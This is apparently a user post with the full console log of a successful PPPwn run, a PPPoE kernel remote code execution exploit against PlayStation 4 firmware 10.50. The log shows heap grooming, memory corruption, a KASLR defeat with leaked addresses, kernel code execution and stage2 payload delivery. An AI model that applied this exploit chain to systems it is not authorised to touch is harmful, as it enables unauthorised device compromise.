Works on 10.50
[+] PPPwn - PlayStation 4 PPPoE RCE by theflow
[+] args: interface=Ethernet fw=1050 stage1=exploit\stage1\stage1_1050.bin stage2=C:\Users\Dima\Desktop\pppwn\exploit\stage2\stage2_1050.bin
[+] STAGE 0: Initialization
[*] Waiting for PADI...
[+] pppoe_softc: 0xffffdfc92ca81000
[+] Target MAC: 2c:cc:44:66:0e:0c
[+] Source MAC: 07:10:a8:2c:c9:df
[+] AC cookie length: 0x4e0
[*] Sending PADO...
[*] Waiting for PADR...
[*] Sending PADS...
[*] Sending LCP configure request...
[*] Waiting for LCP configure ACK...
[*] Waiting for LCP configure request...
[*] Sending LCP configure ACK...
[*] Sending IPCP configure request...
[*] Waiting for IPCP configure ACK...
[*] Waiting for IPCP configure request...
[*] Sending IPCP configure NAK...
[*] Waiting for IPCP configure request...
[*] Sending IPCP configure ACK...
[*] Waiting for interface to be ready...
[+] Target IPv6: fe80::2ecc:44ff:fe66:e0c
[*] Heap grooming...0%
[*] Heap grooming...6%
[*] Heap grooming...12%
[*] Heap grooming...18%
[*] Heap grooming...25%
[*] Heap grooming...31%
[*] Heap grooming...37%
[*] Heap grooming...43%
[*] Heap grooming...50%
[*] Heap grooming...56%
[*] Heap grooming...62%
[*] Heap grooming...68%
[*] Heap grooming...75%
[*] Heap grooming...81%
[*] Heap grooming...87%
[*] Heap grooming...93%
[+] Heap grooming...done
[+] STAGE 1: Memory corruption
[*] Pinning to CPU 0...0%
[*] Pinning to CPU 0...6%
[*] Pinning to CPU 0...12%
[*] Pinning to CPU 0...18%
[*] Pinning to CPU 0...25%
[*] Pinning to CPU 0...31%
[*] Pinning to CPU 0...37%
[*] Pinning to CPU 0...43%
[*] Pinning to CPU 0...50%
[*] Pinning to CPU 0...56%
[*] Pinning to CPU 0...62%
[*] Pinning to CPU 0...68%
[*] Pinning to CPU 0...75%
[*] Pinning to CPU 0...81%
[*] Pinning to CPU 0...87%
[*] Pinning to CPU 0...93%
[+] Pinning to CPU 0...done
[*] Sending malicious LCP configure request...
[*] Waiting for LCP configure reject...
[*] Sending LCP configure request...
[*] Waiting for LCP configure ACK...
[*] Waiting for LCP configure request...
[*] Sending LCP configure ACK...
[*] Sending IPCP configure request...
[*] Waiting for IPCP configure ACK...
[*] Waiting for IPCP configure request...
[*] Sending IPCP configure NAK...
[*] Waiting for IPCP configure request...
[*] Sending IPCP configure ACK...
[+] Scanning for corrupted object...found fe80::0f1f:4141:4141:4141
[+] STAGE 2: KASLR defeat
[*] Defeating KASLR...
[+] pppoe_softc_list: 0xffffffff96b414b8
[+] kaslr_offset: 0x126f0000
[+] STAGE 3: Remote code execution
[*] Sending LCP terminate request...
[*] Waiting for PADI...
[+] pppoe_softc: 0xffffdfc92ca81000
[+] Target MAC: 2c:cc:44:66:0e:0c
[+] Source MAC: 8d:cb:90:94:ff:ff
[+] AC cookie length: 0x514
[*] Sending PADO...
[*] Waiting for PADR...
[*] Sending PADS...
[*] Triggering code execution...
[*] Waiting for stage1 to resume...
[*] Sending PADT...
[*] Waiting for PADI...
[+] pppoe_softc: 0xffffdfc92c97bc00
[+] Target MAC: 2c:cc:44:66:0e:0c
[+] AC cookie length: 0x0
[*] Sending PADO...
[*] Waiting for PADR...
[*] Sending PADS...
[*] Sending LCP configure request...
[*] Waiting for LCP configure ACK...
[*] Waiting for LCP configure request...
[*] Sending LCP configure ACK...
[*] Sending IPCP configure request...
[*] Waiting for IPCP configure ACK...
[*] Waiting for IPCP configure request...
[*] Sending IPCP configure NAK...
[*] Waiting for IPCP configure request...
[*] Sending IPCP configure ACK...
[+] STAGE 4: Arbitrary payload execution
[*] Sending stage2 payload...
[+] Done!
The STAGE2.bin for your firmware is in the update.zip archive